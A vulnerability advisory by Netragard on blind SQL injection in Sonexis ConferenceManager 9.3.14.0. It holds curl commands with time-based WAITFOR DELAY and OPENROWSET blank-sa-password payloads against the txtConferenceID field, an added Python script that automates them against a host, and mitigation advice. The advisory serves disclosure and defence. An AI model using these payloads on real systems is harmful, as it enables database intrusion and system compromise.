
Sonexis ConferenceManager 9.3.14.0 Blind SQL Injection

Date: 10 Apr 2011 | Reported by: Adriel T. Desautels | Type: packetstorm | Source: packetstormsecurity.com

Sonexis ConferenceManager 9.3.14.0 Blind SQL Injection vulnerability in web conferencing syste

Code
`*************************** NETRAGARD ADVISORY ************************  
http://www.netragard.com  
Research Driven Penetration Testing  
  
[POSTING NOTICE]  
--------------------------------------------------------------------------  
If you intend to post this advisory on your web page please create a  
clickable link back to the original Netragard advisory as the contents  
of the advisory may be updated. The advisory can be found on the  
Netragard website at http://www.netragard.com/  
  
For more information about Netragard visit http://www.netragard.com  
  
[Advisory Information]  
--------------------------------------------------------------------------  
Contact : Adriel T. Desautels  
Advisory ID : NETRAGARD-20110910 (Corrected)  
Researcher : Kevin Finisterre & Team  
Product Name : Sonexis ConferenceManager  
Product Version : 9.3.14.0 (Tested On)  
Vendor Name : Sonexis Technology, Inc.  
Type of Vulnerability : Blind SQL Injection   
Impact : Critical  
Date Discovered : 01/19/2011  
Vendor Notified : 01/26/2011  
  
[Notes About This Advisory]  
--------------------------------------------------------------------------  
Netragard's team discovered and exploited this vulnerability on January   
19th 2011 during the delivery of research based penetration testing services.  
Netragard notified the vendor about this vulnerability on January 26th 2011.   
Netragard did not receive any communications back from Sonexis after initial  
notification.   
  
According to an advisory published by Solutionary, Solutionary discovered  
this same vulnerability on 01/27/2011. Solutionary notified Sonexis   
of the vulnerability on 02/18/2011 and received a vendor response back on  
03/02/2011. Solutionary published a low detail advisory for this issue on  
04/06/2011.  
  
It is Netragard's policy to refrain from publishing vulnerabilities  
until after methods for remediation have been created/provided. Exceptions  
to this policy are made in the event that vendors are non-responsive or in  
the event that the vulnerability becomes public knowledge.   
  
  
[Product Description]  
--------------------------------------------------------------------------  
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality   
audio platform is recognized for its ease-of-use, security, and   
cost-effectiveness — and it offers a comprehensive set of integrated Web  
conferencing capabilities. Better still, our unique architecture allows you  
unlimited flexibility. You're never more than a license key away from   
increasing users, adding Web functionality, or changing from one protocol  
to another. Simply put, it's the best thing to happen to conferencing."  
  
Taken From:  
http://www.sonexis.com/products/product_details.asp  
  
[Technical Summary]  
--------------------------------------------------------------------------  
The Sonexis ConferenceManager does not adhere to best practices as defined  
by the Open Web Application Security Project (OWASP), the de facto standard   
for Web Application Security. Specifically, the Sonexis ConferenceManager   
fails the OWASP Data Validation Criterion as well as others that are not  
discussed in this advisory.  
  
This advisory discloses details about a Blind SQL Injection vulnerability  
that was discovered by Netragard during the delivery of research driven   
penetration testing services. Successful exploitation of this  
vulnerability enables the attacker to take full control of the affected  
system. Netragard has created and will provide Proof of Concept code for  
this vulnerability shortly after the publication of this Advisory.  
  
Netragard has not received any information from the vendor since initial   
notification. As of the time of the authoring of this Advisory no official  
vendor patches have been made public. Netragard has provided methods for   
mitigation in this advisory.  
  
For more information about OWASP criterion please visit the URL Below:   
  
--> https://www.owasp.org/index.php/Category:Vulnerability <--  
  
[Technical Details]  
--------------------------------------------------------------------------  
The tests shown below can be used to determine if your Sonexis  
ConferenceManager is vulnerable. Each test POSTs an injected value in the  
txtConferenceID form field and measures the wall-clock response time with  
`time`; the `+` characters in the request bodies are form-encoded spaces  
that the server decodes before the value reaches the query. Network latency  
is added to every measurement, so compare each result against a request  
that carries no injected delay.  
  
Test Environment:  
-----------------  
web server operating system: Windows 2003  
web application technology: ASP.NET, Microsoft IIS 6.0, ASP  
back-end DBMS: Microsoft SQL Server 2000  
  
  
--- TEST 1 ---  
Validated SQL command execution with the "waitfor+delay+'0:0:3'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 3 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m3.281s <--- Command Execution Successful!  
user 0m0.000s  
sys 0m0.004s  
--- END TEST 1 ---  
  
  
--- TEST 2 ---  
Validated SQL command execution with the "waitfor+delay+'0:0:5'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 5 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m5.277s <--- Command Execution Successful!  
user 0m0.001s  
sys 0m0.003s  
--- END TEST 2 ---  
  
  
--- TEST 3 ---  
Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 10 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m10.280s <--- Command Execution Successful!  
user 0m0.002s  
sys 0m0.004s  
--- END TEST 3 ---  
  
  
--- TEST 4 ---  
This test is an example of how to check for a blank "sa" password in the   
MsSQL Database. OPENROWSET is evaluated by the database server itself, so  
the probe attempts a loopback login as "sa" with an empty password and only  
executes the delay if that login succeeds. If the password is set (the login  
fails) there will be no delay in the server response. If the password is not  
set, then there will be a 10 second delay. The same request is shown twice  
below, once for each outcome.   
  
netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"   
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m0.305s <-- Password is set (no delay).   
user 0m0.003s  
sys 0m0.001s  
  
netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"   
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m10.101s <-- Password is not set (delay).   
user 0m0.002s  
sys 0m0.003s  
--- END TEST 4 ---  
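The four timing checks above, TEST 1 through TEST 4, carried out as an added Python example. This is not Netragard's proof-of-concept code and not part of ConferenceManager; it reproduces the advisory's requests (same form field, same path, same WAITFOR DELAY and OPENROWSET payloads) and adds the baseline measurement and multi-delay confirmation a practitioner wants before calling a host injectable. The `slack` and `baseline_runs` values, the command-line host argument and `SimulatedTarget` (a constructed stand-in that returns the seconds a real server would take, so the logic runs offline) are assumptions of this example, not details from the advisory.

```python
"""Time-based blind SQL injection checks from the Netragard advisory (added example).

Not Netragard's PoC and not Sonexis code. SimulatedTarget is a constructed
stand-in for a ConferenceManager host; slack/baseline_runs are assumed values.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

PARAM = "txtConferenceID"        # injection point named in the advisory
PATH = "/login/hostlogin.asp"    # request path from the advisory

Timer = Callable[[str], float]   # form body -> elapsed seconds


def waitfor_payload(seconds: int) -> str:
    """Form body for TEST 1-3: close the string, append WAITFOR DELAY, comment out the rest."""
    return urllib.parse.urlencode({PARAM: f"1' waitfor delay '0:0:{seconds}'--"})


def sa_blank_password_payload(seconds: int) -> str:
    """Form body for TEST 4: the delay fires only if OPENROWSET can log in as sa with no password."""
    probe = ("1';if (SELECT 1 from OPENROWSET('SQLoledb',"
             "'server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 "
             f"waitfor delay '0:0:{seconds}';--")
    return urllib.parse.urlencode({PARAM: probe})


def http_timer(url: str, timeout: float = 60.0) -> Timer:
    """Real transport (assumed usage): POST the body, return wall-clock seconds to a response."""
    def send(body: str) -> float:
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=body.encode(), timeout=timeout).read()
        except OSError:          # HTTP 500 from a broken query still carries timing information
            pass
        return time.monotonic() - start
    return send


def confirm_delay(send: Timer, payload_for: Callable[[int], str],
                  delays=(3, 5, 10), baseline_runs: int = 3, slack: float = 1.0) -> bool:
    """Report injectable only if every requested delay shows up in the response time.

    The baseline is the slowest of several plain requests; requiring 3, 5 and 10 s
    (the advisory's values) all to be reflected stops one slow response from
    producing a false positive.
    """
    baseline = max(send(urllib.parse.urlencode({PARAM: "1"})) for _ in range(baseline_runs))
    for d in delays:
        if send(payload_for(d)) < baseline + d - slack:
            return False
    return True


def sa_password_is_blank(send: Timer, delay: int = 10, slack: float = 1.0) -> bool:
    """TEST 4: True when the OPENROWSET probe delays, i.e. sa accepted an empty password."""
    baseline = send(urllib.parse.urlencode({PARAM: "1"}))
    return send(sa_blank_password_payload(delay)) >= baseline + delay - slack


class SimulatedTarget:
    """Constructed stand-in for a ConferenceManager host (not a real server).

    Returns the seconds a server would take: base latency, plus the requested
    WAITFOR DELAY when the input is concatenated into the query, and for the
    OPENROWSET probe only when the sa account has a blank password.
    """
    _DELAY = re.compile(r"waitfor\s+delay\s*'0:0:(\d+)'", re.IGNORECASE)
    _OPENROWSET = re.compile(r"OPENROWSET\('SQLoledb','server=127\.0\.0\.1;uid=sa;pwd=',",
                             re.IGNORECASE)

    def __init__(self, vulnerable: bool, sa_blank: bool = False, latency: float = 0.3):
        self.vulnerable, self.sa_blank, self.latency = vulnerable, sa_blank, latency

    def __call__(self, body: str) -> float:
        value = urllib.parse.parse_qs(body)[PARAM][0]   # server decodes '+' and %xx first
        m = self._DELAY.search(value)
        if not (self.vulnerable and m and "'" in value):
            return self.latency          # input treated as data, or no delay requested
        if self._OPENROWSET.search(value) and not self.sa_blank:
            return self.latency          # sa login fails, so the IF branch never runs
        return self.latency + int(m.group(1))


if __name__ == "__main__":
    import sys
    # Usage: python check.py <host>   (assumed CLI; without a host the simulated target is used)
    target = http_timer("http://" + sys.argv[1] + PATH) if len(sys.argv) > 1 \
        else SimulatedTarget(vulnerable=True)
    print("time-based injection confirmed:", confirm_delay(target, waitfor_payload))
    print("sa password blank:", sa_password_is_blank(target))
```

The detector treats a host as injectable only when all three delays are reflected above a measured baseline, which is the check the advisory performs by hand across TEST 1 to TEST 3; `sa_password_is_blank` is TEST 4 with the same baseline correction.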
  
[Impact]  
--------------------------------------------------------------------------  
Exploitation Difficulty : Trivial  
Risk : Complete System Compromise, Distributed Metastasis, Access To  
Sensitive Data, etc.  
  
  
[Proof Of Concept]  
--------------------------------------------------------------------------  
Netragard created a Proof of Concept exploit for this vulnerability that  
will be published on Netragard's website shortly after the release of   
this advisory.   
  
  
[Vendor Status and Chronology]  
--------------------------------------------------------------------------  
  
01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC.  
01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC.  
01/27/2011 - Vulnerability Discovered by Solutionary.  
02/18/2011 - Vendor Notified of the Vulnerability by Solutionary.  
03/02/2011 - Vendor Responds to Solutionary.  
04/06/2011 - Solutionary publishes a low detail advisory with no mitigation.  
04/10/2011 - Netragard publishes high detail advisory with mitigation.  
  
  
[Mitigation]  
--------------------------------------------------------------------------  
This vulnerability can be mitigated by filtering application requests with  
a Web Application Firewall. Because the injection point is a POST form  
field (txtConferenceID), the filter must inspect request bodies, not only  
the query string.   
  
Further mitigation can be accomplished with custom filtering done through the  
Web Server configuration.   
  
Note: Mitigation does not constitute a proper fix. If an attacker is able   
to circumvent mitigation techniques then exploitation is still possible.  
An example of Web Application Firewall subversion can be found at the   
following URL: http://pentest.netragard.com/?p=10  
  
  
[Solution]  
--------------------------------------------------------------------------  
Vendor must perform a review of the Sonexis ConferenceManager source code  
and ensure that it adheres to the OWASP criterion. In particular, the value  
of txtConferenceID (and every other user-supplied value) must be passed to  
the database as a bound parameter rather than concatenated into the SQL  
statement, which is the root cause of this issue.   
  
  
[Disclaimer]  
------------------------http://www.netragard.com--------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
  
`
